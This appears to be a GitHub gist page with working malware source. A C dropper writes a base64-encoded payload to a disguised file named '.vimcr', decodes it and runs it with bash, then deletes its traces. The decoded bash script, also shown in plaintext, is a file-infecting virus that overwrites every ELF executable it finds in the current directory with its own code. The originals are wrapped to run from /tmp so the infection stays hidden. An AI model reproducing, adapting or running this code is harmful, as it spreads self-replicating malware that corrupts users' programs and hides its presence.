#include <stdlib.h> | |
#include <stdio.h> | |
char payload[]="IyEvYmluL2Jhc2gKRD0wCkVOQz0iYmFzZTY0IC13IDAiCkRFQz0iYmFzZTY0IC1kIgoKZnVuY3Rpb24gZGJnICgpCnsKCWlmIFsgJEQgLWd0IDAgXTsgdGhlbgoJCWVjaG8gIltERUJVR10gJDI6ICIkMSAxPiYyCglmaQp9CgpmdW5jdGlvbiByYW5kb20gKCkKewoJaWYgWyAteiAiJDEiIF07IHRoZW4KCQlsZW49MTYKCWVsc2UKCQlsZW49JDEKCWZpCglfdD0kKGRkIGlmPS9kZXYvdXJhbmRvbSBvZj0vZGV2L3N0ZG91dCBicz0kbGVuIGNvdW50PTEgMj4vZGV2L251bGx8YmFzZTY0fHNlZCAicy9bXC9cK10vMC9nIikKCWVjaG8gJHtfdDowOiRsZW59Cn0KCgpmdW5jdGlvbiBnZXRfcGVybSAoKQp7CglpZiBbIC16ICIkMSIgXTsgdGhlbgoJCWRiZyAiTm8gZmlsZSBwYXRoIGdpdmVuIiAiZ2V0X3Blcm0iCgkJZWNobyAwCgllbHNlCgkJZWNobyAkKHN0YXQgLWMgIiVhIiAiJDEiIDI+JjEpCglmaQp9CgpmdW5jdGlvbiBzZXRfcGVybSgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXSB8fCBbIC16ICIkMiIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggb3Igbm8gcGVybSBnaXZlbiIgInNldF9wZXJtIgoJCWVjaG8gMgogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICQoY2htb2QgJDEgIiQyIiAyPi9kZXYvbnVsbCkKICAgICAgICBmaQp9CgoKZnVuY3Rpb24gZ2V0X3VnICgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggZ2l2ZW4iICJnZXRfcGVybSIKICAgICAgICAgICAgICAgIGVjaG8gMAogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGVjaG8gJChzdGF0IC1jICIlVTolRyIgIiQxIiAyPiYxKQogICAgICAgIGZpCQp9CgpmdW5jdGlvbiBlbmNfYmluYXJ5ICgpCnsKCWlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBnaXZlbiIgImVuY19iaW5hcnkiCiAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgZWNobyAkKGNhdCAiJDEiIHwkRU5DIDI+JjEpCiAgICAgICAgZmkKfQoKZnVuY3Rpb24gZGVjX2JpbmFyeSgpCnsKCWlmIFsgLXogIiQxIiBdIHx8IFsgLXogIiQyIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBvciBlbmNvZGVkIHBhcmFtIGdpdmVuIiAiZGVjX2JpbmFyeSIKICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBlY2hvICQyfCAkREVDIDI+L2Rldi9udWxsID4gIiQxIgogICAgICAgIGZpCn0KCmZ1bmN0aW9uIHNjYW5uZXIoKQp7CQoJcHRoPSQxCglmb3IgZiBpbiAkcHRoLyo7IGRvCgkJZGJnICJmb3VuZCAkZiIgc2Nhbm5lcgoJCWlmIFsgISAteiAkKGZpbGUgIiRmIiB8Z3JlcCAtb0UgRUxGKSBdICYmICEgW1sgIiRmIiA9PSAiLi92aXJ1cyIgXV07IHRoZW4KCQkJZGJnICJpbmZlY3RpbmcgJGYiIHNjYW5uZXIKCQkJX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCV9wZXJtPSQoZ2V0X3Blcm0gIiRmIikKCQkJX3VnPSQoZ2V0X3VnICIkZiIpCgkJCWRiZyAicGVybSAkX3Blcm0sIHVnICRfdWciIHNjYW5uZXIKCQkJaGVhZCAiJDAiIC1uMTAzID4gIiRmIgoJCQlfdGQ9Ii90bXAvc3NoLSIkKHJhbmRvbSAxMCkKCQkJZWNobyAibWtkaXIgJF90ZCAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJkZWNfYmluYXJ5IFwiJF90ZC8iJChiYXNlbmFtZSAiJGYiKSJcIiAkX3QiID4+ICIkZiIKCQkJZWNobyAiY2hvd24gJF91ZyBcIiRfdGQvJGZcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJjaG1vZCAkX3Blcm0gXCIkX3RkLyRmXCIgMj4vZGV2L251bGwiID4+ICIkZiIKCQkJZWNobyAiXCIkX3RkLyRmXCIgXCRAIiA+PiAiJGYiCgkJCWVjaG8gInJtIC1yZiBcIiRfdGRcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQkjX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCSNlY2hvICJlY2hvICRfdHwgJERFQyB8YmFzaCIgPiAiJGYiCgkJCWNob3duICRfdWcgIiRmIiAyPi9kZXYvbnVsbAoJCQljaG1vZCAkX3Blcm0gIiRmIiAyPi9kZXYvbnVsbAoJCWZpCglkb25lCQp9CgpzY2FubmVyIC4gMj4vZGV2L251bGwKZWNobyBIZWxsbyEgSSBhbSBhIHNpbXBsZSB2aXJ1cyEKCg=="; | |
void main(){ | |
char cmd[3000]="/bin/bash"; | |
FILE *f = fopen(".vimcr", "w"); | |
if(f==NULL){exit(1);} | |
fprintf(f, payload); | |
fclose(f); | |
system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr"); | |
unlink(".vimcr"); | |
unlink(".screencr"); | |
} |
#!/bin/bash | |
D=0 | |
ENC="base64 -w 0" | |
DEC="base64 -d" | |
function dbg () | |
{ | |
if [ $D -gt 0 ]; then | |
echo "[DEBUG] $2: "$1 1>&2 | |
fi | |
} | |
function random () | |
{ | |
if [ -z "$1" ]; then | |
len=16 | |
else | |
len=$1 | |
fi | |
_t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g") | |
echo ${_t:0:$len} | |
} | |
function get_perm () | |
{ | |
if [ -z "$1" ]; then | |
dbg "No file path given" "get_perm" | |
echo 0 | |
else | |
echo $(stat -c "%a" "$1" 2>&1) | |
fi | |
} | |
function set_perm() | |
{ | |
if [ -z "$1" ] || [ -z "$2" ]; then | |
dbg "No file path or no perm given" "set_perm" | |
echo 2 | |
else | |
$(chmod $1 "$2" 2>/dev/null) | |
fi | |
} | |
function get_ug () | |
{ | |
if [ -z "$1" ]; then | |
dbg "No file path given" "get_perm" | |
echo 0 | |
else | |
echo $(stat -c "%U:%G" "$1" 2>&1) | |
fi | |
} | |
function enc_binary () | |
{ | |
if [ -z "$1" ]; then | |
dbg "No file path given" "enc_binary" | |
else | |
echo $(cat "$1" |$ENC 2>&1) | |
fi | |
} | |
function dec_binary() | |
{ | |
if [ -z "$1" ] || [ -z "$2" ]; then | |
dbg "No file path or encoded param given" "dec_binary" | |
else | |
echo $2| $DEC 2>/dev/null > "$1" | |
fi | |
} | |
function scanner() | |
{ | |
pth=$1 | |
for f in $pth/*; do | |
dbg "found $f" scanner | |
if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then | |
dbg "infecting $f" scanner | |
_t=$(enc_binary "$f") | |
_perm=$(get_perm "$f") | |
_ug=$(get_ug "$f") | |
dbg "perm $_perm, ug $_ug" scanner | |
head "$0" -n103 > "$f" | |
_td="/tmp/ssh-"$(random 10) | |
echo "mkdir $_td 2>/dev/null" >> "$f" | |
echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f" | |
echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f" | |
echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f" | |
echo "\"$_td/$f\" \$@" >> "$f" | |
echo "rm -rf \"$_td\" 2>/dev/null" >> "$f" | |
#_t=$(enc_binary "$f") | |
#echo "echo $_t| $DEC |bash" > "$f" | |
chown $_ug "$f" 2>/dev/null | |
chmod $_perm "$f" 2>/dev/null | |
fi | |
done | |
} | |
scanner . 2>/dev/null | |
echo You're doomed! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment